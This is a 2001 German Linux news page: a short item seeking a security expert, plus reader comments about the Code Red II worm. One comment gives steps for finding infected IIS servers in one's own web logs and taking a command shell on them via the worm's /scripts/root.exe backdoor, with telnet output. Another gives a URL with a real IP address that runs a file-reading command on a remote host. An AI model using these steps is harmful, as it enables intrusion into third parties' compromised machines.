symlink.ch
Wissen Vernetzt - deutsche News für die Welt
 
symlink.ch
FAQ
Mission
Über uns
Richtlinien

Moderation
Einstellungen
Story einsenden

Suchen & Index
Ruhmeshalle
Statistiken
Umfragen

Redaktion
Themen
Partner
Planet

XML | RDF | RSS
PDA | WAP | IRC
Symbar für Opera
Symbar für Mozilla

Freunde
Benutzergruppen
LUG Switzerland
LUG Vorarlberg
LUGen in DE
SIUG
CCCZH
Organisationen
Wilhelm Tux
FSF Europe
Events
LinuxDay Dornbirn
BBA Schweiz
CoSin in Bremgarten AG
VCFe in München
Menschen
maol
Flupp
Ventilator
dawn
gumbo
krümelmonster
XTaran
maradong
tuxedo

 
Security-Spezialist gesucht
Veröffentlicht durch maol am Mittwoch 08. August, 13:12
Aus der Symlink,-Dein-Freund-und-Helfer Abteilung
Security Soeben erhalten wir diesen Hilferuf "Ich suche jemanden, der mir bei einer Story für den Pctip behilflich sein könnte. Thema: IT-Sec" maol meint: könnte hier nicht IP-Sec gemeint sein? Meldet Euch bei Bruno von k@ontent, falls Ihr helfen könnt.

Dolby vs. NetBSD | Druckausgabe | Windows XP "Upgrade"  >

 

 
symlink.ch Login
Login:

Passwort:

extrahierte Links
  • ZDNet
  • maol
  • Pctip
  • IP-Sec
  • k@ontent
  • Mehr zu Security
  • Auch von maol
  • Diese Diskussion wurde archiviert. Es können keine neuen Kommentare abgegeben werden.
    iT_SEC (Score:2, Informativ)
    Von mgeiser am Wednesday 08. August, 14:28 MET (#1)
    (User #260 Info) http://www.dodeka.ch
    Ich glaube nicht, dass er etwas von der Firma iT_SEC will. Aber wer weiss...
    secu (Score:1)
    Von Umbi (umbi@resurrection-dot.com) am Wednesday 08. August, 16:59 MET (#2)
    (User #396 Info)
    gesucht ist noch jemand, der eine live hack demo macht. vorhanden sind 2 PCs mit ADSL. brauchbar waere z.b. ein password sniffing und ein einbruch (auf m anderen PC z.b.)
    Hackangriff (Score:1)
    Von markus_b am Wednesday 08. August, 22:13 MET (#3)
    (User #124 Info) http://www.markus.org

    Im Moment ist das (zu) einfach:

    • Webserver aufsetzen
    • Log nach 'GET /default.ida?XXXX' durchsuchen und IP-Adresse notieren
    • Mit telnet einbrechen:
      [markus] $ telnet 195.202.xxx.xx 80
      Trying 195.202.xxx.xx...
      Connected to 195.202.xxx.xx.
      Escape character is '^]'.
      get /scripts/root.exe
      HTTP/1.1 200 OK
      Server: Microsoft-IIS/5.0
      Date: Wed, 08 Aug 2001 21:12:17 GMT
      Content-Type: application/octet-stream
      Microsoft Windows 2000 [Version 5.00.2195]
      (C) Copyright 1985-1999 Microsoft Corp.
      c:\inetpub\scripts>

    Markus

    Re:Hackangriff (Score:0)
    Von Anonymer Feigling am Thursday 09. August, 09:22 MET (#4)
    Was kann ich mit c:\inetpub\scripts> überhaupt machen?
    es reagiert nicht mal auf ein ls.
    Re:Hackangriff (Score:0)
    Von Anonymer Feigling am Thursday 09. August, 12:04 MET (#5)
    ls = Unix dir = Windo$e ;-)
    Re:Hackangriff (Score:1)
    Von bones am Thursday 09. August, 12:06 MET (#6)
    (User #481 Info) http://www.p-guhl.ch
    Wenn ich das jetzt richtig interpretiere ist dieses Programm "root.exe" eine Art Shell. Du musst also die Befehle verwenden, die "root.exe" versteht. Ob da "ls" dabei ist weiss ich nicht; immerhin ist der Programmierer des Wurms ja wohl in der Windows-Welt zu Hause. Da würde ich für sowas "dir" erwarten. Es könnte aber alles sein.

    Grüsse vom Knochen
    (der vielleicht auch ganz daneben liegt, da er bis jetzt keine Lust hatte, sich die genauen technischen Details von CodeRed II anzuschauen. Er hat nämlich einen Apache auf dem Linux-Router)
    Re:Hackangriff (Score:1)
    Von markus_b am Thursday 09. August, 12:30 MET (#7)
    (User #124 Info) http://www.markus.org

    root.exe ist eine Kopie des Windows Kommando-Interpreters cmd.exe. Dieser wird von Code Red II in verschiedenne Verzeichnisse kopiert, die normalerweise CGI-Proggis von IIS enthalten.

    Die technischen Details von Code Red II sind auf www.grc.com gut erklärt.

    Markus

    Re:Hackangriff (Score:0)
    Von Anonymer Feigling am Thursday 09. August, 13:44 MET (#8)
    http://212.13.154.69/scripts/root.exe?/c+type+c:\a.txt
    Re:Hackangriff (Score:1)
    Von bones am Thursday 09. August, 15:31 MET (#10)
    (User #481 Info) http://www.p-guhl.ch
    Was willst Du denn damit den Kasachen antun?

    Grüsse vom Knochen (der das Kommando erst einmal lieber nicht in den browser eingibt)
    Re:Hackangriff (Score:0)
    Von Anonymer Feigling am Thursday 09. August, 15:55 MET (#11)
    War nur ein Beispiel ...
    Re:Hackangriff (Score:1)
    Von bones am Thursday 09. August, 16:30 MET (#12)
    (User #481 Info) http://www.p-guhl.ch
    Ach so ;-)

    Gruss
            bones
    Re:Hackangriff (Score:1)
    Von bones am Thursday 09. August, 15:26 MET (#9)
    (User #481 Info) http://www.p-guhl.ch
    Ach so, danke. Damit liege ich immerhin nicht völlig daneben ;-) Und es ist auch klar, dass der mit "ls" nichts anfangen kann.

    bones

    Linux User Group Schweiz
    Durchsuche symlink.ch:  

    Never be led astray onto the path of virtue.
    trash.net

    Anfang | Story einsenden | ältere Features | alte Umfragen | FAQ | Autoren | Einstellungen